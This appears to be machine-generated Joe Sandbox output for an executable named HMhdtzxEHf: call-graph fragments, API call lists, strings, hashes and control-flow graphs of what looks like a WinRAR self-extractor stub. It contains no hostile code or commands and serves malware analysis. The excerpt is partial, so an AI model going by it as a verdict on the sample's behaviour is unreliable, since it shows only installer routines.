25059->25020 25062 a422a1 25060->25062 25061 a422ba 25085 a40eed 86 API calls 25061->25085 
25062->25061 25065 a422ce 25062->25065 25064 a422c1 25064->25065 25066->25013 25067->25026 25068->25033 25069->25032 25071 a3b146 GetVersionExW 25070->25071 25072 a37c69 25071->25072 25072->25042 25079 a3d12a __InternalCxxFrameHandler 25073->25079 25074 a3d29a 25075 a3d0cb 6 API calls 25074->25075 25076 a3d2ce 25074->25076 25075->25076 25077 a40e08 SetThreadExecutionState RaiseException 25076->25077 25080 a3d291 25077->25080 25078 a48c8d 103 API calls 25078->25079 25079->25074 25079->25078 25079->25080 25081 a3ac05 91 API calls 25079->25081 25080->25047 25081->25079 25082->25047 25083->25057 25084->25057 25085->25064 25086->24801 25087->24801 25088->24798 25090 a35d2a 25089->25090 25136 a35c4b 25090->25136 25093 a35d5d 25094 a35d95 25093->25094 25141 a3b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25093->25141 25094->24815 25096 a38186 25095->25096 25097 a38232 25096->25097 25148 a3be5e 19 API calls __InternalCxxFrameHandler 25096->25148 25147 a41fac CharUpperW 25097->25147 25100 a3823b 25100->24818 25102 a37c22 25101->25102 25103 a37c5a 25102->25103 25149 a36e7a 74 API calls 25102->25149 25103->24829 25105 a37c52 25150 a3138b 74 API calls 25105->25150 25107->24882 25109 a39db3 25108->25109 25111 a39dc2 25108->25111 25110 a39db9 FlushFileBuffers 25109->25110 25109->25111 25110->25111 25112 a39e3f SetFileTime 25111->25112 25112->24887 25113->24808 25114->24819 25115->24819 25116->24829 25117->24829 25118->24825 25119->24836 25120->24831 25121->24836 25123 a38b5a 25122->25123 25124 a398c5 GetFileType 25122->25124 25123->24852 25125 a32021 74 API calls 25123->25125 25124->25123 25125->24850 25126->24852 25127->24853 25128->24878 25129->24878 25130->24878 25131->24878 25132->24878 25133->24881 25134->24890 25135->24833 25142 a35b48 25136->25142 25138 a35c6c 25138->25093 25140 a35b48 2 API calls 25140->25138 25141->25093 25143 a35b52 25142->25143 25145 a35c3a 25143->25145 25146 a3b1dc CharUpperW CompareStringW _wcslen 

                                                                                            APIs
                                                                                              • Part of subcall function 00A40863: GetModuleHandleW.KERNEL32(kernel32), ref: 00A4087C
                                                                                              • Part of subcall function 00A40863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A4088E
                                                                                              • Part of subcall function 00A40863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A408BF
                                                                                              • Part of subcall function 00A4A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A4A655
                                                                                              • Part of subcall function 00A4AC16: OleInitialize.OLE32(00000000), ref: 00A4AC2F
                                                                                              • Part of subcall function 00A4AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A4AC66
                                                                                              • Part of subcall function 00A4AC16: SHGetMalloc.SHELL32(00A78438), ref: 00A4AC70
                                                                                            • GetCommandLineW.KERNEL32 ref: 00A4DF5C
                                                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A4DF83
                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A4DF94
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00A4DFCE
                                                                                              • Part of subcall function 00A4DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A4DBF4
                                                                                              • Part of subcall function 00A4DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A4DC30
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A4DFD7
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00A8EC90,00000800), ref: 00A4DFF2
                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00A8EC90), ref: 00A4DFFE
                                                                                            • GetLocalTime.KERNEL32(?), ref: 00A4E009
                                                                                            • _swprintf.LIBCMT ref: 00A4E048
                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A4E05A
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00A4E061
                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 00A4E078
                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00A4E0C9
                                                                                            • Sleep.KERNEL32(?), ref: 00A4E0F7
                                                                                            • DeleteObject.GDI32 ref: 00A4E130
                                                                                            • DeleteObject.GDI32(?), ref: 00A4E140
                                                                                            • CloseHandle.KERNEL32 ref: 00A4E183
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                            • API String ID: 3049964643-3743209390
                                                                                            • Opcode ID: b97ce652bec48d4acb734c7133d3098b4ebc42c4648c2d2c7201cd8e308bbf03
                                                                                            • Instruction ID: 83dcd1a9cec16fda543c862890a4d986b1e744615a4dc7608b1bb2cda8678353
                                                                                            • Opcode Fuzzy Hash: b97ce652bec48d4acb734c7133d3098b4ebc42c4648c2d2c7201cd8e308bbf03
                                                                                            • Instruction Fuzzy Hash: 6E61F3B5944245BFD720EBF8AD49F2B37ACBB85740F00042AF94A92191DBB8994AC761

                                                                                            APIs
                                                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6D5
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6EC
                                                                                            • LoadResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A703
                                                                                            • LockResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A712
                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A4B73D,00000066), ref: 00A4A72D
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00A4A73E
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A4A762
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00A4A7C6
                                                                                              • Part of subcall function 00A4A626: GdipAlloc.GDIPLUS(00000010), ref: 00A4A62C
                                                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A4A7A7
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00A4A7CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                            • String ID: PNG
                                                                                            • API String ID: 211097158-364855578
                                                                                            • Opcode ID: b026489a0cc405d96a49453a10053e2aa9b97946ce30f00aaf20a89809385461
                                                                                            • Instruction ID: 2ea166f465e4a70873d2a3f5aef47e1498ba644524afcfc88ae2f76580cd959a
                                                                                            • Opcode Fuzzy Hash: b026489a0cc405d96a49453a10053e2aa9b97946ce30f00aaf20a89809385461
                                                                                            • Instruction Fuzzy Hash: 7E31A47A640302AFDB20DF61DC48D2BBBB9FFD5751B044619F805C2620EB71DD46DA61

                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6C4
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6F2
                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6FE
                                                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A728
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A734
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 42610566-0
                                                                                            • Opcode ID: 1ed85acf21d37da803d196b7b0c91b16e4d34aaa6aae12fd8d2f150b688d748f
                                                                                            • Instruction ID: d73ff8fa1445ea0d2ba80239bb435bedab12649af717968629178aa829a956c5
                                                                                            • Opcode Fuzzy Hash: 1ed85acf21d37da803d196b7b0c91b16e4d34aaa6aae12fd8d2f150b688d748f
                                                                                            • Instruction Fuzzy Hash: 35417D76900125ABCB25DF64CCC4AE9B7B8FB59350F104196F5AEE3200D7346E95CF91
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002,00000000), ref: 00A57E0F
                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002,00000000), ref: 00A57E16
                                                                                            • ExitProcess.KERNEL32 ref: 00A57E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: b4149744fe7555dc41760f5575ca033404f663f863e528ea87394fa83ccc860d
                                                                                            • Instruction ID: cb9e0e7ac2f0916cd12161801728a03b4697f4f5d7d5d2efb0f887e36dd81040
                                                                                            • Opcode Fuzzy Hash: b4149744fe7555dc41760f5575ca033404f663f863e528ea87394fa83ccc860d
                                                                                            • Instruction Fuzzy Hash: 7DE0BF32004244ABCF11AF54DD0A9497F79FF50342B014454FC15AA172CB75DE5BCA90
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 815c8d05e46b950f8a647f0b3bdd5ac72a4b2850899bbdd942a792a1b1c19d35
                                                                                            • Instruction ID: 2978016e743ba0d9d4b5c8c4719b6f5495598a3f8fd3699eb85cfc46f4e82817
                                                                                            • Opcode Fuzzy Hash: 815c8d05e46b950f8a647f0b3bdd5ac72a4b2850899bbdd942a792a1b1c19d35
                                                                                            • Instruction Fuzzy Hash: EA82FA71904345AEDF25DF64C891BFEBBB9BF05300F0841B9F8499B242DB795A88CB60
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A4B7E5
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4B8D1
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B8EF
                                                                                            • IsDialogMessageW.USER32(?,?), ref: 00A4B902
                                                                                            • TranslateMessage.USER32(?), ref: 00A4B910
                                                                                            • DispatchMessageW.USER32(?), ref: 00A4B91A
                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00A4B93D
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00A4B960
                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00A4B983
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4B99E
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4B9B1
                                                                                              • Part of subcall function 00A4D453: _wcslen.LIBCMT ref: 00A4D47D
                                                                                            • SetFocus.USER32(00000000), ref: 00A4B9B8
                                                                                            • _swprintf.LIBCMT ref: 00A4BA24
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                              • Part of subcall function 00A4D4D4: GetDlgItem.USER32(00000068,00A8FCB8), ref: 00A4D4E8
                                                                                              • Part of subcall function 00A4D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00A4AF07,00000001,?,?,00A4B7B9,00A6506C,00A8FCB8,00A8FCB8,00001000,00000000,00000000), ref: 00A4D510
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4D51B
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4D529
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D53F
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4D559
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D59D
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A4D5AB
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D5BA
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D5E1
                                                                                              • Part of subcall function 00A4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00A643F4), ref: 00A4D5F0
                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A4BA68
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00A4BA90
                                                                                            • GetTickCount.KERNEL32 ref: 00A4BAAE
                                                                                            • _swprintf.LIBCMT ref: 00A4BAC2
                                                                                            • GetLastError.KERNEL32(?,00000011), ref: 00A4BAF4
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00A4BB43
                                                                                            • _swprintf.LIBCMT ref: 00A4BB7C
                                                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00A4BBD0
                                                                                            • GetCommandLineW.KERNEL32 ref: 00A4BBEA
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00A4BC47
                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00A4BC6F
                                                                                            • Sleep.KERNEL32(00000064), ref: 00A4BCB9
                                                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00A4BCE2
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A4BCEB
                                                                                            • _swprintf.LIBCMT ref: 00A4BD1E
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4BD7D
                                                                                            • SetDlgItemTextW.USER32(?,00000065,00A635F4), ref: 00A4BD94
                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00A4BD9D
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00A4BDAC
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A4BDBB
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4BE68
                                                                                            • _wcslen.LIBCMT ref: 00A4BEBE
                                                                                            • _swprintf.LIBCMT ref: 00A4BEE8
                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A4BF32
                                                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00A4BF4C
                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00A4BF55
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00A4BF6B
                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00A4BF85
                                                                                            • SetWindowTextW.USER32(00000000,00A7A472), ref: 00A4BFA7
                                                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00A4C007
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4C01A
                                                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00A4C0BD
                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00A4C197
                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00A4C1D9
                                                                                              • Part of subcall function 00A4C73F: __EH_prolog.LIBCMT ref: 00A4C744
                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4C1FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                            • API String ID: 3445078344-2238251102
                                                                                            • Opcode ID: 0d9ddb930817e6259e5672d58b7d266398b6a31393156d97010bf084093c2260
                                                                                            • Instruction ID: b1befdcaedd54bb6c38a775d3894eb87c3959a20729de959ef4ca828ae1df7f2
                                                                                            • Opcode Fuzzy Hash: 0d9ddb930817e6259e5672d58b7d266398b6a31393156d97010bf084093c2260
                                                                                            • Instruction Fuzzy Hash: EE42E475A84244BEEF21EBF49D4AFBE377CAB41700F004155F649A60E2CBB49E46CB21

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 268 a40863-a40886 call a4ec50 GetModuleHandleW 271 a408e7-a40b48 268->271 272 a40888-a4089f GetProcAddress 268->272 273 a40c14-a40c40 GetModuleFileNameW call a3c29a call a40602 271->273 274 a40b4e-a40b59 call a575fb 271->274 275 a408a1-a408b7 272->275 276 a408b9-a408c9 GetProcAddress 272->276 291 a40c42-a40c4e call a3b146 273->291 274->273 285 a40b5f-a40b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 a408e5 276->279 280 a408cb-a408e0 276->280 279->271 280->279 288 a40b8f-a40b9b SetFilePointer 285->288 289 a40c08-a40c0f CloseHandle 285->289 288->289 292 a40b9d-a40bb9 ReadFile 288->292 289->273 297 a40c50-a40c5b call a4081b 291->297 298 a40c7d-a40ca4 call a3c310 GetFileAttributesW 291->298 292->289 294 a40bbb-a40be0 292->294 296 a40bfd-a40c06 call a40371 294->296 296->289 304 a40be2-a40bfc call a4081b 296->304 297->298 309 a40c5d-a40c7b CompareStringW 297->309 306 a40ca6-a40caa 298->306 307 a40cae 298->307 304->296 306->291 310 a40cac 306->310 311 a40cb0-a40cb5 307->311 309->298 309->306 310->311 313 a40cb7 311->313 314 a40cec-a40cee 311->314 315 a40cb9-a40ce0 call a3c310 GetFileAttributesW 313->315 316 a40cf4-a40d0b call a3c2e4 call a3b146 314->316 317 a40dfb-a40e05 314->317 323 a40ce2-a40ce6 315->323 324 a40cea 315->324 327 a40d73-a40da6 call a34092 AllocConsole 316->327 328 a40d0d-a40d6e call a4081b * 2 call a3e617 call a34092 call a3e617 call a4a7e4 316->328 323->315 326 a40ce8 323->326 324->314 326->314 333 a40df3-a40df5 ExitProcess 327->333 334 a40da8-a40ded GetCurrentProcessId AttachConsole call a53e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00A4087C
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A4088E
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A408BF
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A40B69
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A40B83
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A40B93
                                                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00A63C7C,00000000), ref: 00A40BB1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A40C09
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A40C1E
                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00A63C7C,?,00000000,?,00000800), ref: 00A40C72
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00A63C7C,00000800,?,00000000,?,00000800), ref: 00A40C9C
                                                                                            • GetFileAttributesW.KERNEL32(?,?,00A63D44,00000800), ref: 00A40CD8
                                                                                              • Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                              • Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            • _swprintf.LIBCMT ref: 00A40D4A
                                                                                            • _swprintf.LIBCMT ref: 00A40D96
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • AllocConsole.KERNEL32 ref: 00A40D9E
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A40DA8
                                                                                            • AttachConsole.KERNEL32(00000000), ref: 00A40DAF
                                                                                            • _wcslen.LIBCMT ref: 00A40DC4
                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A40DD5
                                                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00A40DDC
                                                                                            • Sleep.KERNEL32(00002710), ref: 00A40DE7
                                                                                            • FreeConsole.KERNEL32 ref: 00A40DED
                                                                                            • ExitProcess.KERNEL32 ref: 00A40DF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                            • API String ID: 1207345701-3298887752
                                                                                            • Opcode ID: 9944b1a78ca2d1ad9eeebc35c39cb699ccfd2841119118dc76aabcdf77bf6722
                                                                                            • Instruction ID: a2ab7ed63aaedf8c9b095e058f79ab2e096e11e01afdc104b7a26e4b2f4b3c7a
                                                                                            • Opcode Fuzzy Hash: 9944b1a78ca2d1ad9eeebc35c39cb699ccfd2841119118dc76aabcdf77bf6722
                                                                                            • Instruction Fuzzy Hash: 24D154B2408344ABDB21DFA08949F9FBAF8BB85704F51491DF2859B150C7B5864ECBA2

                                                                                            Control-flow Graph

